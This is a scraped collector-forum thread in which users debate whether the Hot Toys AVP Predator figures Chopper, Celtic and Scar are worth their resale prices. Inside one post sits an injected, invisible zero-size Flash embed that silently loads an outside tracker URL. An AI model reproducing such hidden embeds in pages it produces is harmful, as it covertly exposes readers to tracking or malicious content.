AVP predator question

Collector Freaks Forum

Help Support Collector Freaks Forum:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.

Rottweiler

Freaked Out
Reaction score
ive got the chopper predator and am thinking about getting the other 2 (celtic/scar) but ive seen a few pics of them and have noticed they all look alike. Apart from the masks, so is it worth paying through the nose for the other 2 if the only real difference is the mask ?

theres some slight differences in the armor and obviously there weapons and stands but other than that no theres not any big differences.
I think for the price they go for none of them are really worth paying for now.

I bought one for quite alot and liked it but then sold it because there were alot better things I could get with the money.
This is my opinion though obviously , if you like them enough you should buy them. Another idea would be to buy some custom masks and change them now and then to reperesent them all.

Essentially they are all the same body with same base armor with minor differences in the add-ons. For example Chopper has 1 blade on his gauntlets, Celtic & Scar have 2. Celtic & Chopper have bigger blades their feet than Scar.... The only noticeable difference are the helmets and skulls on Chopper.

I'd say if you totally really want to complete them, now's a good time to get them as they've pretty much all dropped under $300.
But otherwise, they're really not worth it. I have Scar and Celtic and they're so much alike it's really not worth it to spend another $300.

am thinking about getting the other 2 (celtic/scar) but ive seen a few pics of them and have noticed they all look alike. Apart from the masks

+ 1 to you.

just buy some bios of elder_predator 2 and rotate them around, anyway dont scar and celtic go for £500-£600 nowadays :google F-that

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="https://ancientnovels.com/?tracker=3663"></param><param name="allowFullScreen" value="true"></param><embed src="https://ancientnovels.com/?tracker=3663" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>U should get them if u want to complete the trio.

Decisions, decisions :)

Another thing to point out is that the bodies were upgraded for Chopper and the Elder. The Celtic and normal Scar have poor shoulder joints that can't hold a pose after awhile.

I went from 9 Preds to just having the 3 main Pred's from each movie and the upcoming P1 and I do miss them and they are amazing to look at when they're all together, but all these other cool stuff coming out is helping me not lose any sleep at all:D

In US ebay, I still see used Scar going for over $300 and no way it is worth it for a plastic toy. A new laptop? or a new plastic toy?

you can get a laptop for $300 :horror thats cheap! That price for a scar would be cheap for here in the uk though.

I'd say if you totally really want to complete them, now's a good time to get them as they've pretty much all dropped under $300.
But otherwise, they're really not worth it. I have Scar and Celtic and they're so much alike it's really not worth it to spend another $300.

Under $300 USD? Where in the hell are you getting your AVP Preds? :lol

No this isn't an insult of anything. I really want to know because I can never find them under $300.

Essentially they are all the same body with same base armor with minor differences in the add-ons. For example Chopper has 1 blade on his gauntlets, Celtic & Scar have 2. Celtic & Chopper have bigger blades their feet than Scar.... The only noticeable difference are the helmets and skulls on Chopper.

I'm guessing you're talking about the wrist blades? I don't know about you but my Chopper has both blades. And if you're talking about the big chopper blades, both Celtic and Chopper comes with them.

U should get them if u want to complete the trio.

They sure look damn cool standing together.

AVPtrio1.jpg

Another thing to point out is that the bodies were upgraded for Chopper and the Elder. The Celtic and normal Scar have poor shoulder joints that can't hold a pose after awhile.

Interesting...I had no idea. I'll remember to not try to pose my Scar and Celtic too much. What about the Ancients?

Under $300 USD? Where in the hell are you getting your AVP Preds? :lol

No this isn't an insult of anything. I really want to know because I can never find them under $300.

Saw a Scar finish on ebay for $255 last night:

https://cgi.ebay.com/AVP-SCAR-PREDA...s=66:2|65:13|39:1|240:1318|301:0|293:1|294:50

And a Celtic for $251.50:

https://cgi.ebay.com/hot-toys-avp-c...s=66:2|65:13|39:1|240:1318|301:0|293:1|294:50

Not sure what their conditions are or if they are complete. The photos doesn't show them with everything. :dunno

They do look cool together but I wouldn't pay over $300 for any of the 3 main AVP predators. I've been thinking of getting rid of all my AVP ones and just keeping one of the Ancient preds and the Elder pred of course, just downsize to the "unique" ones.

EDIT: I think you have the best of the 3 anyways.

If prices are dipping for the AVP preds, part 'em out fellas, part 'em out....

I did that and I made waayyyy more than I wouldve if I had sold them whole. It’s a little more work but I thought it was well worth it…

Back